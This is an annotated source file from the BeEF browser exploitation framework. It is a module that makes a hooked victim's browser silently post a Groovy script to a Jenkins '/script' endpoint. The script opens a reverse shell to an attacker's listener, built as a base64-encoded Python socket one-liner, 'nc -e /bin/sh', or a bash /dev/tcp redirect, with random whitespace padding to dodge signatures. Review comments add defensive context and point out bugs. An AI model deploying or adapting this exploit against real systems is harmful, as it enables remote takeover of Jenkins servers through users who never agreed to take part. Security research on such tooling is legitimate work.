GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/jenkins_groovy_code_exec/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// BeEF command-module body. This file is an ERB template: every <%= ... %>
// placeholder is substituted server-side before the script is delivered to the
// hooked browser, so the text below is not valid JavaScript until rendered.
//
// What it does: builds a Groovy snippet (one of three reverse-shell variants)
// and submits it as a form POST, from an iframe in the victim's page, to the
// '/script' path under the configured target URI.
//
// Defensive context (NOTE(review): confirm against the Jenkins deployment in
// question): the request is a cross-site form submission, so it presumably
// only succeeds when the target accepts the POST without a CSRF token and the
// browser's session is allowed to run scripts. The observable request shape is
// a urlencoded POST to <uri>/script with the fields 'script' and 'Submit=Run';
// the spawned process then connects out to lhost:lport, which egress filtering
// on the Jenkins host would block.
beef.execute(function() {
  // Target and callback parameters, all injected by the template.
  var rproto = '<%= @rproto %>';
  var rhost = '<%= @rhost %>';
  var rport = '<%= @rport %>';
  var targeturi = '<%= @uri %>';
  var lhost = '<%= @lhost %>';
  var lport = '<%= @lport %>';
  // The values are concatenated as-is; nothing here validates or URL-encodes them.
  var target = rproto + '://' + rhost + ':' + rport + targeturi + '/script';
  // Seconds to wait before cleanup() is attempted (multiplied by 1000 below).
  var timeout = 15;
  var payload_name = '<%= @payload %>';
  // Used only as a prefix in debug messages.
  var peer = rhost + ':' + rport;

  // Assigned without var/let/const, so this becomes an implicit global (and
  // would throw in strict mode). The string-form setTimeout below relies on
  // that, because a string callback is evaluated in global scope.
  cleanup = function() {
    try {
      // NOTE(review): this identifier is declared with `var` inside exploit()
      // further down, so it is not in lexical scope here. Unless something else
      // defines a global of the same name, this line throws, the catch branch
      // logs it, and the iframe stays in the DOM.
      document.body.removeChild(jenkins_groovy_code_exec_iframe_<%= @command_id %>);
    } catch(e) {
      beef.debug("Could not remove iframe: " + e.message);
    }
  }
  // String argument: evaluated like eval() when the timer fires.
  setTimeout("cleanup()", timeout*1000);

  // Returns the Groovy source for the selected payload_name. Also an implicit
  // global; the local `var payload` below shadows it inside the function.
  payload = function() {
    // Builds a run of 3 to 12 spaces. The loop bound is re-drawn from
    // Math.random() on every iteration, so the length is not uniform.
    var whitespace = '';
    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';
    var payload = '';
    // In every branch, each single space in the template string is replaced by
    // the random run above. The resulting text therefore varies per execution;
    // signatures that match the literal string should normalise whitespace first.
    switch (payload_name) {
      case "reverse_python":
        // Python one-liner that connects to lhost:lport and attaches /bin/sh.
        var cmd = "import socket,subprocess,os;host=\""+lhost+"\";port="+lport+";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
        // Pads every ',' and ';' with the random whitespace before encoding,
        // so the base64 text also differs between runs.
        cmd = cmd.replace(/,/g, whitespace+','+whitespace).replace(/;/g, whitespace+';'+whitespace)
        var encoded_cmd = btoa(cmd);
        // Groovy list .execute() that launches /usr/bin/python -c with the
        // base64 string decoded and exec'd on the target.
        payload = 'proc = [ "/usr/bin/python" , "-c" , "exec ( \''+encoded_cmd+'\'.decode ( \'base64\' ) )" ].execute()';
        payload = payload.replace(/ /g, whitespace);
        break;
      case "reverse_netcat":
        // Launches /bin/nc with -e /bin/sh towards lhost:lport.
        payload = 'proc = [ "/bin/nc" , "' + lhost + '" , "' + lport + '" , "-e" , "/bin/sh" ].execute()';
        payload = payload.replace(/ /g, whitespace);
        break;
      default: // "reverse_bash", and any payload_name not matched above
        // Launches bash with its streams redirected to /dev/tcp/lhost/lport.
        payload = 'proc = [ "/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1" ].execute()';
        payload = payload.replace(/ /g, whitespace);
        break;
    }
    return payload
  }

  // Builds the payload and submits it to `target`. Implicit global, like
  // cleanup and payload above.
  exploit = function() {
    var groovy = payload();
    beef.debug(peer + " - Sending payload (" + groovy.length + " bytes)");
    // presumably creates an iframe holding an auto-submitting form; verify in
    // beef.dom. The two hidden fields are the whole request body.
    var jenkins_groovy_code_exec_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded",
      [
        {'type':'hidden', 'name':'script', 'value':groovy },
        {'type':'hidden', 'name':'Submit', 'value':'Run' },
      ]);
    // Sent immediately after the form is created. Nothing reads the target's
    // response, so this reports that an attempt was made, not that it succeeded.
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
  }

  // Only synchronous errors raised while building or submitting the form are
  // caught here; the outcome of the POST itself is not observed.
  try {
    exploit();
  } catch(e) {
    beef.debug(peer + " - Exploit failed: " + e.message);
  }

});